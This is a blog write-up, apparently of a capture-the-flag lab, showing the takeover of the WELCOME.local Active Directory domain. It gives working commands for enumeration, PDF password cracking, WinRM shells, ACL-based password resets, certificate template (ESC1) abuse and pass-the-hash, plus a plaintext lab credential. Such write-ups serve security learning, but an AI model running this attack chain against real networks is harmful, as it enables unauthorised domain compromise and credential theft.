CyberNexusBlog

Red Team Engagement: WELCOME.local

Youssef Ketaj's photo
Youssef Ketaj

4 min read

Cover Image for Red Team Engagement: WELCOME.local

Table of contents

Objective: From an initial foothold, escalate privileges to Domain Admin and demonstrate full domain compromise.

1. Initial Reconnaissance

Our initial scan of the target 10.1.160.68 revealed it to be DC01.WELCOME.local, a Windows Server 2022 Domain Controller.

Key services identified were:

  • Active Directory: LDAP (389), Kerberos (88), LDAPS (636)

  • File Sharing: SMB (445)

  • Remote Access: RDP (3389), MSRPC (135, dynamic)

  • Certificate Services: The SSL certs indicate the server is also a Certificate Authority (WELCOME-CA).

Using our initial credentials (e.hills:Il0vemyj0b2025!), we authenticated to SMB and enumerated shares. The Human Resources share was found to be readable by our user.

2. BloodHound Enumeration

With our foothold, the next logical step was to map the Active Directory environment to find privilege escalation paths. We used bloodhound-python to collect the data.

bloodhound-python --zip -c All -d WELCOME.local -u e.hills -p 'Il0vemyj0b2025!' -dc DC01.WELCOME.local -ns 10.1.160.68

This command collects all users, groups, computers, and ACLs, saving them to a .zip file. After importing this "loot" into the BloodHound GUI, we confirmed that our user, e.hills, had no direct privilege escalation paths (like GenericAll or WriteDACL) to high-value targets.

This clean result forced us to pivot from direct ACL abuse to manual enumeration and hunting for credentials.

2. Escalation: From e.hills to a.harris

Our first step was to investigate the Human Resources share for sensitive information.

  1. We connected to the share using smbclient:

     smbclient "//10.1.160.68/Human Resources" -U "WELCOME\e.hills"

    Password: Il0vemyj0b2025!

  2. Inside, we found several files, including Welcome Start Guide.pdf. We downloaded it using mget *.

  3. The PDF was password-protected. We extracted its hash using pdf2john.py and cracked it with john.

     pdf2john.py Welcome\ Start\ Guide.pdf > pdf.hash
 john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash

  4. The cracked password was: [REDACTED_PDF_PASSWORD].

3. Lateral Movement & User Flag

Our BloodHound analysis (from a bloodhound-python scan) showed that the a.harris account is a member of the Remote Management Users group. This grants the user access via WinRM (Windows Remote Management).

  1. We used evil-winrm to establish an interactive PowerShell session as a.harris.

     evil-winrm -i 10.1.160.68 -u a.harris -p '[REDACTED_PDF_PASSWORD]'

  2. We successfully gained a shell and captured the user flag.

     *Evil-WinRM* PS C:\Users\a.harris\Documents> type ..\Desktop\user.txt

4. Privilege Escalation Chain (a.harris -> i.park -> svc_ca)

This phase involved a multi-step abuse of Active Directory ACLs discovered via BloodHound.

  1. Hop 1 (a.harris -> i.park): BloodHound showed a.harris has GenericAll rights over the user i.park. This allows us to change i.park's password. We used bloodyAD for this.

     bloodyAD --host '10.1.160.68' -d 'WELCOME.local' -u 'a.harris' -p '[REDACTED_PDF_PASSWORD]' set password 'i.park' '[REDACTED_NEW_PASSWORD]'

  2. Hop 2 (i.park -> svc_ca): BloodHound showed i.park is a member of the Helpdesk group, which has ForceChangePassword rights on the svc_ca service account. We used bloodyAD again with our new i.park credentials.

     bloodyAD --host '10.1.160.68' -d 'WELCOME.local' -u 'i.park' -p '[REDACTED_NEW_PASSWORD]' set password 'svc_ca' '[REDACTED_NEW_PASSWORD]'

    We now have credentials for the svc_ca account, which is the key to the final step.

5. Domain Compromise: AD CS (ESC1) Abuse

The svc_ca account name implies a link to the Certificate Authority (WELCOME-CA).

  1. We used certipy to find vulnerable certificate templates that svc_ca could enroll in.

     certipy find -u svc_ca@WELCOME.local -p '[REDACTED_NEW_PASSWORD]' -dc-ip 10.1.160.68 -vulnerable

  2. The output confirmed a critical ESC1 vulnerability. The template Welcome-Template allows the enrolling user (svc_ca) to supply an arbitrary Subject Alternative Name (SAN), and the template is valid for client authentication.

  3. We exploited this by requesting a new certificate using this template, but we set the SAN to impersonate the Administrator user.

     certipy req -u 'svc_ca' -p '[REDACTED_NEW_PASSWORD]' \
 -ca 'WELCOME-CA' \
 -template 'Welcome-Template' \
 -upn 'administrator@WELCOME.local' \
 -dc-ip 10.1.160.68

  4. This saved a PFX file (administrator.pfx) to our machine.

  5. We then used certipy auth to authenticate to the DC as the administrator, using the certificate. This returned the administrator's NTLM hash.

     certipy auth -pfx administrator.pfx -dc-ip 10.1.160.68

    Hash: [REDACTED_ADMIN_HASH]

6. Domain Domination (Administrator Shell)

With the Administrator's NTLM hash, we have full control. We used evil-winrm again, this time passing the NT hash ([REDACTED_ADMIN_NT_HASH]) with the -H flag.

evil-winrm -i 10.1.160.68 -u 'Administrator' -H '[REDACTED_ADMIN_NT_HASH]'

We were immediately granted a SYSTEM-level shell, completing the objective.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

This engagement successfully chained misconfigured file shares, weak PDF passwords, and multiple Active Directory misconfigurations (ACL abuse and AD CS ESC1) to move from a low-privilege user to full Domain Admin.